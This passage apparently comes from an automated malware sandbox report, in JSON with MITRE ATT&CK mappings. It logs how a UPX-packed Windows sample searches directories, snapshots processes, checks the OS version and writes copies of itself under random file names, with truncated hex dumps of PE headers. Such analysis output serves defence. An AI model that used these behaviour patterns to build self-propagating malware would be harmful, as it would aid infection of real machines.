[targetUID: 00000000-00005956]\n \"vxbrbpd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vxbrbpd.exe]- [targetUID: 00000000-00005996]\n \"hfxjvn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hfxjvn.exe]- [targetUID: 00000000-00005860]\n \"026026.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\026026.exe]- [targetUID: 00000000-00005728]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"IsWow64Process\" with parameter \"5728\" - (UID: 00000000-00005728)\n \"026026.exe\" called \"IsWow64Process\" with parameter \"5860\" - (UID: 00000000-00005860)\n \"hfxjvn.exe\" called \"IsWow64Process\" with parameter \"6136\" - (UID: 00000000-00006136)\n \"22428.exe\" called \"IsWow64Process\" with parameter \"4388\" - (UID: 00000000-00004388)\n \"66488.exe\" called \"IsWow64Process\" with parameter \"3512\" - (UID: 00000000-00003512)\n \"068466.exe\" called \"IsWow64Process\" with parameter \"2260\" - (UID: 00000000-00002260)\n \"06200.exe\" called \"IsWow64Process\" with parameter \"6036\" - (UID: 00000000-00006036)\n \"0484046.exe\" called \"IsWow64Process\" with parameter \"5740\" - (UID: 00000000-00005740)\n \"drpdftl.exe\" called \"IsWow64Process\" with parameter \"4232\" - (UID: 00000000-00004232)\n \"frbnxt.exe\" called \"IsWow64Process\" with parameter \"4172\" - (UID: 00000000-00004172)\n \"hptntt.exe\" called \"IsWow64Process\" with parameter \"6112\" - (UID: 00000000-00006112)\n \"vtrppln.exe\" called \"IsWow64Process\" with parameter \"4116\" - (UID: 00000000-00004116)\n \"rdttflx.exe\" called \"IsWow64Process\" with parameter \"852\" - (UID: 00000000-00000852)\n \"lxrhrth.exe\" called \"IsWow64Process\" with parameter \"3668\" - (UID: 00000000-00003668)\n \"4228006.exe\" called \"IsWow64Process\" with parameter \"1372\" - (UID: 00000000-00001372)\n \"2820044.exe\" called \"IsWow64Process\" with parameter \"3812\" - (UID: 00000000-00003812)\n \"8600684.exe\" called \"IsWow64Process\" with parameter \"2528\" - (UID: 00000000-00002528)\n \"2006628.exe\" called \"IsWow64Process\" with parameter \"1880\" - (UID: 00000000-00001880)\n \"fpplvv.exe\" called \"IsWow64Process\" with parameter \"4124\" - (UID: 00000000-00004124)\n \"dpjjvjv.exe\" called \"IsWow64Process\" with parameter \"2552\" - (UID: 00000000-00002552)\n \"ttldj.exe\" called \"IsWow64Process\" with parameter \"3692\" - (UID: 00000000-00003692)\n \"tlbnpbh.exe\" called \"IsWow64Process\" with parameter \"3424\" - (UID: 00000000-00003424)\n \"rpbfjr.exe\" called \"IsWow64Process\" with parameter \"4236\" - (UID: 00000000-00004236)\n \"jrrhxbf.exe\" called \"IsWow64Process\" with parameter \"3456\" - (UID: 00000000-00003456)\n \"lfnjxdh.exe\" called \"IsWow64Process\" with parameter \"4524\" - (UID: 00000000-00004524)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000270018f0270013f02700000000000000000000002400000000011ce312000000000080f0120095e12777b6311700feffffff435c2b7750592b77aa000000b800000012f0270010f02700a4e41200dce81200000000000000000000000000000000000000000000000000400c0000000024001c5c2a7760d84575ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2b773af02700a06a017586000000a4e41200dce812000000000086008800a06a0175a4e41200916c01753af02700a06a0175a06a017514e9120002020000 (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005728)\n \"026026.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005860)\n \"026026.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f00f8171f00f3171f00000000000000000000001c00000000011ce312000000000080f0120095e1277770361700feffffff435c2b7750592b77aa000000b8000000f2171f00f0171f00a4e41200dce81200000000000000000000000000000000000000000000000000800b000000001c001c5c2a7760d84575ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2b771a181f00a06a017586000000a4e41200dce812000000000086008800a06a0175a4e41200916c01751a181f00a06a0175a06a017514e9120002020000 (UID: 00000000-00005860)\n \"026026.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005860)\n \"hfxjvn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006136)\n \"hfxjvn.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a0080312a007b312a00000000000000000000002700000000011ce312000000000080f0120095e12777f03b1700feffffff435c2b7750592b77aa000000b80000007a312a0078312a00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c2a7760d84575ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2b77a2312a00a06a017586000000a4e41200dce812000000000086008800a06a0175a4e41200916c0175a2312a00a06a0175a06a017514e9120002020000 (UID: 00000000-00006136)\n \"hfxjvn.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006136)\n \"vxbrbpd.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002700b0a62700aba62700000000000000000000002400000000011ce312000000000080f0120095e12777fc381700feffffff435c2b7750592b77aa000000b8000000aaa62700a8a62700a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c2a7760d84575ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2b77d2a62700a06a017586000000a4e41200dce812000000000086008800a06a0175a4e41200916c0175d2a62700a06a0175a06a017514e9120002020000 (UID: 00000000-00005996)\n \"vxbrbpd.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005996)\n \"lbvtbl.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002300a8be2300a3be2300000000000000000000001e0000000001ecdf12000000000050ed120095e127776f3c1700feffffff435c2b7750592b77aa000000b8000000a2be2300a0be230074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5c2a7760d84575ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ed2b77cabe2300a06a01758600000074e11200ace512000000000086008800a06a017574e11200916c0175cabe2300a06a0175a06a0175e4e5120002020000 (UID: 00000000-00005956)\n \"lbvtbl.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005956)\n \"22428.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004388)\n \"22428.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a0040402a003b402a00000000000000000000002700000000011ce312000000000080f0120095e1277743221700feffffff435c2b7750592b77aa000000b80000003a402a0038402a00a4e41200dce81200000000000000000000000000000000000000000000000000600c0000000027001c5c2a7760d84575ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2b7762402a00a06a017586000000a4e41200dce812000000000086008800a06a0175a4e41200916c017562402a00a06a0175a06a017514e9120002020000 (UID: 00000000-00004388)\n \"22428.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004388)\n \"66488.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003512)\n \"66488.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000025009836250093362500000000000000000000002200000000011ce312000000000080f0120095e1277746201700feffffff435c2b7750592b77aa000000b80000009236250090362500a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c2a7760d84575ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2b77ba362500a06a017586000000a4e41200dce812000000000086008800a06a0175a4e41200916c0175ba362500a06a0175a06a017514e9120002020000 (UID: 00000000-00003512)\n \"66488.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003512)\n \"4640842.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f0028aa2f0023aa2f00000000000000000000002c00000000011ce312000000000080f0120095e1277767291700feffffff435c2b7750592b77aa000000b800000022aa2f0020aa2f00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c2a7760d84575ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2b774aaa2f00a06a017586000000a4e41200dce812000000000086008800a06a0175a4e41200916c01754aaa2f00a06a0175a06a017514e9120002020000 (UID: 00000000-00006068)\n \"4640842.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006068)\n \"068466.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002260)\n \"068466.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000310040ef31003bef3100000000000000000000002e00000000011ce312000000000080f0120095e1277751281700feffffff435c2b7750592b77aa000000b80000003aef310038ef3100a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c2a7760d84575ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2b7762ef3100a06a017586000000a4e41200dce812000000000086008800a06a0175a4e41200916c017562ef3100a06a0175a06a017514e9120002020000 (UID: 00000000-00002260)\n \"068466.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002260)\n \"06200.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006036)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter 026026.exe (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter 48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter config.sys (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter Documents and Settings (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter dotnet.au3 (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter dotnet48.exe (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter MSOCache (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter pagefile.sys (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter PerfLogs (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter Program Files (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter ProgramData (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter Recovery (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter System Volume Information (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter Temp (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter TorService (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter Users (UID: 00000000-00005728)\n \"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"FindNextFileW\" with parameter Windows (UID: 00000000-00005728)\n \"026026.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00005860)\n \"026026.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00005860)\n \"026026.exe\" called \"FindNextFileW\" with parameter 026026.exe (UID: 00000000-00005860)\n \"026026.exe\" called \"FindNextFileW\" with parameter 48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe (UID: 00000000-00005860)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"026026.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hfxjvn.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"22428.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"66488.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"068466.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"06200.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"0484046.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"drpdftl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"frbnxt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hptntt.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"vtrppln.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rdttflx.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lxrhrth.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"4228006.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"2820044.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"8600684.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"2006628.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"fpplvv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"dpjjvjv.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"ttldj.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"tlbnpbh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"rpbfjr.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jrrhxbf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"lfnjxdh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.838642378062563", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1\" has an entrypoint in section \"UPX1\"\n \"rfbrlrh.exe\" has an entrypoint in section \"UPX1\"\n \"blpjp.exe\" has an entrypoint in section \"UPX1\"\n \"vllrv.exe\" has an entrypoint in section \"UPX1\"\n \"hpjbbfh.exe\" has an entrypoint in section \"UPX1\"\n \"4000248.exe\" has an entrypoint in section \"UPX1\"\n \"vptfx.exe\" has an entrypoint in section \"UPX1\"\n \"dvlvp.exe\" has an entrypoint in section \"UPX1\"\n \"pdljr.exe\" has an entrypoint in section \"UPX1\"\n \"brvtdb.exe\" has an entrypoint in section \"UPX1\"\n \"2846688.exe\" has an entrypoint in section \"UPX1\"\n \"488862.exe\" has an entrypoint in section \"UPX1\"\n \"06448.exe\" has an entrypoint in section \"UPX1\"\n \"vjrdb.exe\" has an entrypoint in section \"UPX1\"\n \"tdplj.exe\" has an entrypoint in section \"UPX1\"\n \"02482.exe\" has an entrypoint in section \"UPX1\"\n \"86844.exe\" has an entrypoint in section \"UPX1\"\n \"njnplr.exe\" has an entrypoint in section \"UPX1\"\n \"jbvjrv.exe\" has an entrypoint in section \"UPX1\"\n \"djhxhx.exe\" has an entrypoint in section \"UPX1\"\n \"rdtdhx.exe\" has an entrypoint in section \"UPX1\"\n \"jhhhxxb.exe\" has an entrypoint in section \"UPX1\"\n \"llfppf.exe\" has an entrypoint in section \"UPX1\"\n \"hxfnr.exe\" has an entrypoint in section \"UPX1\"\n \"xtxdjfh.exe\" has an entrypoint in section \"UPX1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"48c6e4a7c0cb1d1f353362edead646db84a49d943fa42543e0434ce4231f25b1.exe\" wrote 49118 bytes starting with PE header signature to file \"C:\\026026.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"026026.exe\" wrote 49131 bytes starting with PE header signature to file \"C:\\hfxjvn.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"hfxjvn.exe\" wrote 49150 bytes starting with PE header signature to file \"C:\\vxbrbpd.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"vxbrbpd.exe\" wrote 49169 bytes starting with PE header signature to file \"C:\\lbvtbl.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"lbvtbl.exe\" wrote 49180 bytes starting with PE header signature to file \"C:\\22428.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"22428.exe\" wrote 49199 bytes starting with PE header signature to file \"C:\\66488.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"66488.exe\" wrote 49216 bytes starting with PE header signature to file \"C:\\4640842.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"4640842.exe\" wrote 49227 bytes starting with PE header signature to file \"C:\\068466.exe\": 4d5aff000300000004000000ffff0000504500004c0103006b0cff540000000000000000ff000f030b01060000ff00000010000000ff0100404602001000000000600200000040000010000000020000040000000000000004000000000000000070020000020000000000000200000000001000001000000000100000100000 ...\n \"068466.exe\" wrote 49244 bytes starting with PE header signature to file \"C:\\06200.exe\": 